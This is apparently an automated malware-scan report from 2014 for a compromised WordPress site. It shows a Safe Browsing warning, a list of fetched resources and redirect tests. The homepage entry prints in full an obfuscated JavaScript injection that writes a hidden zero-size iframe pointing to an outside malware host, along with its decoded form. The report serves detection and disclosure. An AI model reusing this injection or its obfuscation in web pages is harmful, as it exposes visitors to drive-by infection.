Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=99graphicsclub.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.99graphicsclub.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 21 Sep 2014 04:55:40 GMT Location: http://99graphicsclub.com/ Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 X-Pingback: http://99graphicsclub.com/xmlrpc.php X-Powered-By: PHP/5.4.32 | clean |
http://99graphicsclub.com/ | 200 OK Content-Length: 35476 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/147%v233%w241%p158%c202%i168%486% 134%r211%m210%b209%r214%e215%=95%082% 147%t237%l209%=95%w224%d216%h162%0107% 136%e206%g207%t174%082%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe> Antivirus reports:
| ||
http://99graphicsclub.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://99graphicsclub.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://99graphicsclub.com/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 91363 Content-Type: application/javascript | clean |
http://99graphicsclub.com/wp-content/themes/blissful_blog_v1.1/js/menu/hoverIntent.js | 200 OK Content-Length: 3174 Content-Type: application/javascript | clean |
http://99graphicsclub.com/wp-content/themes/blissful_blog_v1.1/js/menu/dropdown.js | 200 OK Content-Length: 1006 Content-Type: application/javascript | clean |
http://earnmoneydo.com/tds/?wordpress_theme&keyword= &from=http://99graphicsclub.com/&inreferer= | 200 OK Content-Length: 5329 Content-Type: text/html | clean |
http://earnmoneydo.com/vendors/jquery/jquery-1.6.4.min.js | 200 OK Content-Length: 91668 Content-Type: application/javascript | clean |
http://earnmoneydo.com/vendors/jquery/jquery-ui-1.8.16.min.js | 200 OK Content-Length: 201875 Content-Type: application/javascript | clean |
http://earnmoneydo.com/cache/js/default/elgg.1406500737.js | 200 OK Content-Length: 62119 Content-Type: text/javascript | clean |
http://earnmoneydo.com/ | 200 OK Content-Length: 44603 Content-Type: text/html | clean |
http://earnmoneydo.com/login | 200 OK Content-Length: 6292 Content-Type: text/html | clean |
http://earnmoneydo.com/forgotpassword | 200 OK Content-Length: 5986 Content-Type: text/html | clean |
http://earnmoneydo.com/activity | 200 OK Content-Length: 44576 Content-Type: text/html | clean |
http://earnmoneydo.com/js/lib/ui.river.js | 200 OK Content-Length: 360 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 99graphicsclub.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Sep 2014 04:55:41 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://99graphicsclub.com/xmlrpc.php
X-Powered-By: PHP/5.4.32
GET / HTTP/1.1
Host: 99graphicsclub.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Sep 2014 04:55:41 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://99graphicsclub.com/xmlrpc.php
X-Powered-By: PHP/5.4.32
Second query (visit from search engine):
GET / HTTP/1.1
Host: 99graphicsclub.com
Referer: http://www.google.com/search?q=99graphicsclub.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 99graphicsclub.com
Referer: http://www.google.com/search?q=99graphicsclub.com
Result:
The result is similar to the first query. There are no suspicious redirects found.